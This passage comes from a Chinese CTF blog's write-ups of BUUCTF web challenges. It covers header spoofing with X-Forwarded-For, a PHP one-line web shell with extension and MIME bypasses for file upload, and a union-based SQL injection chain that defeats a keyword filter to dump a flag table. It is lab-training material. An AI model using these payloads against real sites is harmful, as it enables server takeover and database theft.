<p>说只能来自本地：X-Forwarded-For:127.0.0.1</p>
<p>之后得到flag</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Referer：来自哪个网站</span><br><span class="line">User-agent：浏览器</span><br><span class="line">x-forwarded-for：伪造IP</span><br></pre></td></tr></table></figure>

<h2 id="0xE-极客大挑战-2019-Upload"><a href="#0xE-极客大挑战-2019-Upload" class="headerlink" title="0xE.[极客大挑战 2019]Upload"></a>0xE.[极客大挑战 2019]Upload</h2><p>文件上传，</p>
<p>常用一句话：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">GIF89a? &lt;script language=&quot;php&quot;&gt;eval($_REQUEST[shell])&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<p>绕过后缀：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">php,php3,php4,php5,phtml,pht</span><br></pre></td></tr></table></figure>

<p>更改文件类型：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">image/jpeg</span><br></pre></td></tr></table></figure>

<p>得到flag</p>
<h2 id="0xF-极客大挑战-2019-BabySQL"><a href="#0xF-极客大挑战-2019-BabySQL" class="headerlink" title="0xF.[极客大挑战 2019]BabySQL"></a>0xF.[极客大挑战 2019]BabySQL</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">对or by 有过滤</span><br><span class="line">用union select试下</span><br><span class="line">check.php?username=admin&amp;password=111 %27 uniounionn selecselectt 1,2,3%23</span><br><span class="line"></span><br><span class="line">check.php?username=admin&amp;password=111 %27 uniounionn selecselectt 1,group_concat(schema_name),3 frofromm infoorrmation_schema.schemata %23</span><br><span class="line">可疑数据库：ctf</span><br><span class="line"></span><br><span class="line">check.php?username=admin&amp;password=111 %27 uniounionn selecselectt 1,group_concat(table_name),3 frofromm infoorrmation_schema.tables whewherere table_schema=&#x27;ctf&#x27; %23</span><br><span class="line">有Flag表</span><br><span class="line"></span><br><span class="line">check.php?username=admin&amp;password=111 %27 uniounionn selecselectt 1,group_concat(column_name),3 frofromm infoorrmation_schema.columns whewherere table_schema=&#x27;ctf&#x27; aandnd column_name=&#x27;Flag&#x27;%23</span><br><span class="line">有flag</span><br><span class="line"></span><br><span class="line">check.php?username=admin&amp;password=111 %27 uniounionn selecselectt 1,flag,3 frofromm ctf.Flag%23</span><br><span class="line">得到flag</span><br></pre></td></tr></table></figure>


                                                                    </div>
                                                                    
                                                                        <div class="prev-or-next">
                                                                            <div class="post-foot-next">
                                                                                
                                                                                    <a href="/2021/04/08/64%E4%B8%BApayload%E8%B0%83%E7%94%A8system%E5%A4%B1%E8%B4%A5%E9%97%AE%E9%A2%98/" target="_self">
                                                                                        <i class="iconfont icon-chevronleft"></i>
                                                                                        <span>Prev</span>
                                                                                    </a>
                                                                                    
                                                                            </div>
                                                                            <div class="post-attach">
                                                                                <!-- <span class="post-pubtime">
              <i class="iconfont icon-updatetime" title="Update time"></i>
              2021-04-17
            </span> -->

                                                                                
                                                                                            <span class="post-categories">
          <!-- <i class="iconfont icon-bookmark" title="Categories"></i> -->
          
          <!-- <span class="span--category">
            <a href="/categories/Technology/" title="Technology">
              <b>#</b> Technology
            </a>
          </span> -->
                                                                                            
                                                                                                </span>
                                                                                                
                                                                                    <span class="post-tags">
          <!-- <i class="iconfont icon-tags" title="Tags"></i> -->
          
          <!-- <span class="span--tag">
            <a href="/tags/WEB/" title="WEB">
              <b>#</b> WEB
            </a>
          </span> -->
                                                                                    
                                                                                        </span>
                                                                                        
                                                                            </div>
                                                                            <div class="post-foot-prev">
                                                                                
                                                                                    <a href="/2021/05/03/BUU-WEB-0x10-0x1F/" target="_self">
                                                                                        <span>Next</span>
                                                                                        <i class="iconfont icon-chevronright"></i>
                                                                                    </a>
                                                                                    
                                                                            </div>
                                                                        </div>
                                                                        
                                                                </div>
                                                                
  <div id="btn-catalog" class="btn-catalog">
    <i class="iconfont icon-catalog"></i>
  </div>
  <div class="post-catalog hidden" id="catalog">
    <div class="title">Contents</div>
    <div class="catalog-content">
      
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x1-HCTF-2018-WarmUp"><span class="toc-text">0x1.[HCTF 2018]WarmUp</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x2-%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98-2019-EasySQL"><span class="toc-text">0x2.[极客大挑战 2019]EasySQL</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x3-%E5%BC%BA%E7%BD%91%E6%9D%AF-2019-%E9%9A%8F%E4%BE%BF%E6%B3%A8"><span class="toc-text">0x3.[强网杯 2019]随便注</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1%EF%BC%89-%E5%A0%86%E5%8F%A0%E6%B3%A8%E5%85%A5%EF%BC%9A"><span class="toc-text">1）.堆叠注入：</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x4-%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98-2019-Havefun"><span class="toc-text">0x4.[极客大挑战 2019]Havefun</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x5-SUCTF-2019-EasySQL"><span class="toc-text">0x5.[SUCTF 2019]EasySQL</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1%EF%BC%89%E6%AD%A3%E8%A7%A3"><span class="toc-text">1）正解</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2%EF%BC%89%E9%9D%9E%E9%A2%84%E6%9C%9F%E8%A7%A3"><span class="toc-text">2）非预期解</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x6-ACTF2020-%E6%96%B0%E7%94%9F%E8%B5%9B-Include"><span class="toc-text">0x6.[ACTF2020 新生赛]Include</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x7-%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98-2019-Secret-File"><span class="toc-text">0x7.[极客大挑战 2019]Secret File</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x8-%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98-2019-LoveSQL"><span class="toc-text">0x8.[极客大挑战 2019]LoveSQL</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x9-ACTF2020-%E6%96%B0%E7%94%9F%E8%B5%9B-Exec"><span class="toc-text">0x9.[ACTF2020 新生赛]Exec</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0xA-GXYCTF2019-Ping-Ping-Ping"><span class="toc-text">0xA.[GXYCTF2019]Ping Ping Ping</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-%E6%8B%BC%E6%8E%A5"><span class="toc-text">1)拼接</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-base64"><span class="toc-text">2)base64</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-%E5%86%85%E6%95%9B%E7%BB%95%E8%BF%87-NB"><span class="toc-text">3)内敛绕过(NB)</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0xB-%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98-2019-Knife"><span class="toc-text">0xB.[极客大挑战 2019]Knife</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0xC-RoarCTF-2019-Easy-Calc"><span class="toc-text">0xC.[RoarCTF 2019]Easy Calc</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0xD-%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98-2019-Http"><span class="toc-text">0xD.[极客大挑战 2019]Http</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0xE-%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98-2019-Upload"><span class="toc-text">0xE.[极客大挑战 2019]Upload</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0xF-%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98-2019-BabySQL"><span class="toc-text">0xF.[极客大挑战 2019]BabySQL</span></a></li></ol>
      
    </div>
  </div>

  
<script src="/js/catalog.js"></script>




                                                                    
                                                                        <div class="comments-container">
                                                                            







                                                                        </div>
                                                                        
                                                            </div>
                                                            
        
<div class="footer">
  <div class="social">
    <ul>
      
        <li>
          <a title="github" target="_blank" rel="noopener" href="https://github.com/Ghostasky">
            <i class="iconfont icon-github"></i>
          </a>
        </li>
      
        <li>
          <a title="twitter" target="_blank" rel="noopener" href="https://twitter.com/ghostasky">
            <i class="iconfont icon-twitter"></i>
          </a>
        </li>
      
    </ul>
  </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/Ghostasky">怕什么真理无穷，进一寸有进一寸的欢喜。</a>
        
    </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Copyright © 2022 Oranges</a>
        
    </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Theme by Oranges | Powered by Hexo</a>
        
    </div>
  
</div>

      </div>

      <div class="tools-bar">
        <div class="back-to-top tools-bar-item hidden">
  <a href="javascript: void(0)">
    <i class="iconfont icon-chevronup"></i>
  </a>
</div>


<script src="/js/backtotop.js"></script>



        
  <div class="search-icon tools-bar-item" id="search-icon">
    <a href="javascript: void(0)">
      <i class="iconfont icon-search"></i>
    </a>
  </div>

  <div class="search-overlay hidden">
    <div class="search-content" tabindex="0">
      <div class="search-title">
        <span class="search-icon-input">
          <a href="javascript: void(0)">
            <i class="iconfont icon-search"></i>
          </a>
        </span>
        
          <input type="text" class="search-input" id="search-input" placeholder="Search...">
        
        <span class="search-close-icon" id="search-close-icon">
          <a href="javascript: void(0)">
            <i class="iconfont icon-close"></i>
          </a>
        </span>
      </div>
      <div class="search-result" id="search-result"></div>
    </div>
  </div>

  <script type="text/javascript">
    var inputArea = document.querySelector("#search-input")
    var searchOverlayArea = document.querySelector(".search-overlay")

    inputArea.onclick = function() {
      getSearchFile()
      this.onclick = null
    }

    inputArea.onkeydown = function() {
      if(event.keyCode == 13)
        return false
    }

    function openOrHideSearchContent() {
      let isHidden = searchOverlayArea.classList.contains('hidden')
      if (isHidden) {
        searchOverlayArea.classList.remove('hidden')
        document.body.classList.add('hidden')
        // inputArea.focus()
      } else {
        searchOverlayArea.classList.add('hidden')
        document.body.classList.remove('hidden')
      }
    }

    function blurSearchContent(e) {
      if (e.target === searchOverlayArea) {
        openOrHideSearchContent()
      }
    }

    document.querySelector("#search-icon").addEventListener("click", openOrHideSearchContent, false)
    document.querySelector("#search-close-icon").addEventListener("click", openOrHideSearchContent, false)
    searchOverlayArea.addEventListener("click", blurSearchContent, false)

    var searchFunc = function (path, search_id, content_id) {
      'use strict';
      var $input = document.getElementById(search_id);
      var $resultContent = document.getElementById(content_id);
      $resultContent.innerHTML = "<ul><span class='local-search-empty'>First search, index file loading, please wait...<span></ul>";
      $.ajax({
        // 0x01. load xml file
        url: path,
        dataType: "xml",
        success: function (xmlResponse) {
          // 0x02. parse xml file
          var datas = $("entry", xmlResponse).map(function () {
            return {
              title: $("title", this).text(),
              content: $("content", this).text(),
              url: $("url", this).text()
            };
          }).get();
          $resultContent.innerHTML = "";

          $input.addEventListener('input', function () {
            // 0x03. parse query to keywords list
            var str = '<ul class=\"search-result-list\">';
            var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
            $resultContent.innerHTML = "";
            if (this.value.trim().length <= 0) {
              return;
            }
            // 0x04. perform local searching
            datas.forEach(function (data) {
              var isMatch = true;
              var content_index = [];
              if (!data.title || data.title.trim() === '') {
                data.title = "Untitled";
              }
              var orig_data_title = data.title.trim();
              var data_title = orig_data_title.toLowerCase();
              var orig_data_content = data.content.trim().replace(/<[^>]+>/g, "");
              var data_content = orig_data_content.toLowerCase();
              var data_url = data.url;
              var index_title = -1;
              var index_content = -1;
              var first_occur = -1;
              // only match artiles with not empty contents
              if (data_content !== '') {
                keywords.forEach(function (keyword, i) {
                  index_title = data_title.indexOf(keyword);
                  index_content = data_content.indexOf(keyword);

                  if (index_title < 0 && index_content < 0) {
                    isMatch = false;
                  } else {
                    if (index_content < 0) {
                      index_content = 0;
                    }
                    if (i == 0) {
                      first_occur = index_content;
                    }
                    // content_index.push({index_content:index_content, keyword_len:keyword_len});
                  }
                });
              } else {
                isMatch = false;
              }
              // 0x05. show search results
              if (isMatch) {
                str += "<li><a href='" + data_url + "' class='search-result-title'>" + orig_data_title + "</a>";
                var content = orig_data_content;
                if (first_occur >= 0) {
                  // cut out 100 characters
                  var start = first_occur - 20;
                  var end = first_occur + 80;

                  if (start < 0) {
                    start = 0;
                  }

                  if (start == 0) {
                    end = 100;
                  }

                  if (end > content.length) {
                    end = content.length;
                  }

                  var match_content = content.substr(start, end);

                  // highlight all keywords
                  keywords.forEach(function (keyword) {
                    var regS = new RegExp(keyword, "gi");
                    match_content = match_content.replace(regS, "<span class=\"search-keyword\">" + keyword + "</span>");
                  });

                  str += "<p class=\"search-result-abstract\">" + match_content + "...</p>"
                }
                str += "</li>";
              }
            });
            str += "</ul>";
            if (str.indexOf('<li>') === -1) {
              return $resultContent.innerHTML = "<ul><span class='local-search-empty'>No result<span></ul>";
            }
            $resultContent.innerHTML = str;
          });
        },
        error: function(xhr, status, error) {
          $resultContent.innerHTML = ""
          if (xhr.status === 404) {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>The search.xml file was not found, please refer to：<a href='https://github.com/zchengsite/hexo-theme-oranges#configuration' target='_black'>configuration</a><span></ul>";
          } else {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>The request failed, Try to refresh the page or try again later.<span></ul>";
          }
        }
      });
      $(document).on('click', '#search-close-icon', function() {
        $('#search-input').val('');
        $('#search-result').html('');
      });
    }

    var getSearchFile = function() {
        var path = "/search.xml";
        searchFunc(path, 'search-input', 'search-result');
    }
  </script>




        
  <div class="tools-bar-item theme-icon" id="switch-color-scheme">
    <a href="javascript: void(0)">
      <i id="theme-icon" class="iconfont icon-moon"></i>
    </a>
  </div>

  
<script src="/js/colorscheme.js"></script>





        
  
    <div class="share-icon tools-bar-item">
      <a href="javascript: void(0)" id="share-icon">
        <i class="iconfont iconshare"></i>
      </a>
      <div class="share-content hidden">
        
          <a class="share-item" href="https://twitter.com/intent/tweet?text=' + BUU_WEB%E5%88%B7%E9%A2%98_0x01-0x0F + '&url=' + https%3A%2F%2Fghostasky.github.io%2F2021%2F04%2F17%2FBUU-WEB-0x1-0xF%2F + '" target="_blank" title="Twitter">
            <i class="iconfont icon-twitter"></i>
          </a>
        
        
          <a class="share-item" href="https://www.facebook.com/sharer.php?u=https://ghostasky.github.io/2021/04/17/BUU-WEB-0x1-0xF/" target="_blank" title="Facebook">
            <i class="iconfont icon-facebooksquare"></i>
          </a>
        
      </div>
    </div>
  
  
<script src="/js/shares.js"></script>



      </div>
    </div>
  </body>
</html>
